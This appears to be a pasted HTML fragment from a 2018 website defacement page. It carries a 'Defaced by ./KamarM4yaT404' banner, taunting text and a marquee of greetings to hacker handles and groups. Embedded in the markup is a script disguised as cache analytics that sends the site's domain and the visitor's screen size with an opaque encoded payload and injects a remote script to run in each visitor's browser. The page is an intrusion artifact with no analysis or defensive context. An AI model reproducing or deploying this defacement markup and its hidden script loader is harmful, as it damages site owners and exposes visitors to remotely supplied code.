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Dec 17th, 2018
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  6. <font face="Wallpoet" size="3"color="white"> <br>Zhuahahahahah<br>Defaced by <font size="5" color ="red"> ./KamarM4yaT404 <br> <font face="Arial black" size="3"color="white">Your Website defaced By me :)<br></font></br><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bdJDapdS%2ffnoKdAWGt8hqSxCB3E2GYiA8NKRkCpUGL9Ds5Ki4G%2b2bca19c3Y%2b2MTzesVXPnxZRS1rtsziWJkNghjxoNbX%2fBOo9mwUrdsK1Ii1t62z%2b%2f90LM0V3JlX9Ci3mEO1BfyNoz%2fJL4EM4gua6yNll3twjo8za%2fytVehCMMuUSwCpIY%2bqdWEr0KudS8HthDfZfq3SV95IkYAnQJgOJZ%2bw7oVKX5nnoIsLpabuK4vLTeAc%2b83efxTYE29JewCGcadzo%2bOLdlA8xRZAawOmM4ElTECXr9ndX7ez2cNFUP04c7R7uD%2fnf%2fBdobk4Zmqbf2KYgIDETFhV7Y9Dt23Hc0jqaWU8gVEZUrwR0XaailRo0XJ8a2gJZSbpNNqjA9OBApTC4KWw1p26gsS5V8Hunbf%2btB4fvw73qOMtVxU8uGt%2ftxG3fmEk1Yfr5jEnaGpKp8N15BsWwyjEhgLYFLDixn%2fCruHmlWL%2bnstzHbgfd8EUSwfSq3ohuW6D1Br6ZW8W2xs7%2bGPufrX7g%2b0eb6zfwJIU6xeJm67JefUdMpIsNXKNAt9unmg3lRA%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>
  7. <font color='red' face="Arial black" size="5px">.:: Need help ? ::.</font><br><font color='white' face="Courier new" size="1,5px"></font><br></center>
  8. <font color="darkblue" size="4">
  9. <font color="darkblue" size="5" face="Corier"><font size="5" color="darkblue"><span id="sec">[</span></font><span id="sec">We</span> <span id="sec">Are</span></font> <span id="sec">@OFFICIAL</span> <span id="sec">MEMBER</span></font><font size="5" color="darkblue"><span id="sec">]</span>
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  12. <font color="darkblue" size="4" face="courier new">
  13. <!--Greetz-->
  14. <marquee color="darkblue" behavior="alternate" scrollamount="6" width="70%" style="width: 70%;">&lt;<font color="darkblue">-</font><font color="darkblue">-</font>&gt; MR.Xcyber <font color="darkblue">-</font> Mr.Onion <font color="darkblue">-</font> Mr.Plug1n <font color="darkblue">-</font> ./ZER0H3R0 <font color="darkblue">-</font> Mr./K4NC1L5 <font color="darkblue">-</font> <font><span id="sec">Mr.MythStyx</span></font> <font color="darkblue">-</font> ZSECDET <font color="darkblue">-</font> AkuTersakiti 404 <font color="darkblue">-</font>01` <font color="darkblue">-</font> Mr.Cr00tD1D4LEM <font color="darkblue">-</font> Mr.Omlex8403 <font color="darkblue">-</font> Ghost_Hax0r <font color="darkblue">-</font> ./Tsuki <font color="darkblue">-</font> MR_IO$ <font color="darkblue">-</font> Cyb3rN1nj4 <font color="darkblue">-</font> An0n_punk <font color="darkblue">-</font> Mr.Cr3t <font color="darkblue">-</font> ShinzuRaz <font color="darkblue">-</font> Mr.B4H4 <font color="darkblue">-</font> Mr.SW4GH4T - THE FOOL - MR_D3LT4 - And all member Explosion Squad Cyber<font color="darkblue">-</font> N45HT <font color="darkblue">-</font> Typical Idiot Security <font color="darkblue">-</font> Sunda Cyber Army<font color="darkblue">-</font>C <font color="darkblue">-</font> Dark Side team <font color="darkblue">-</font> Ghost Hunter Illusion <font color="darkblue">-</font> IndoXploit <font color="darkblue">-</font> IndoSec <font color="darkblue">-</font> D704T <font color="darkblue">-</font> Indonesia To The World <font color="darkblue">-</font> Indonesia error Sistem <font color="darkblue">-</font> Crash On Cyber <font color="darkblue">-</font> Bekasi Secnet <font color="darkblue">-</font><font color="darkblue">-</font><font color="darkblue">And all my friend</font>&gt;</marquee>
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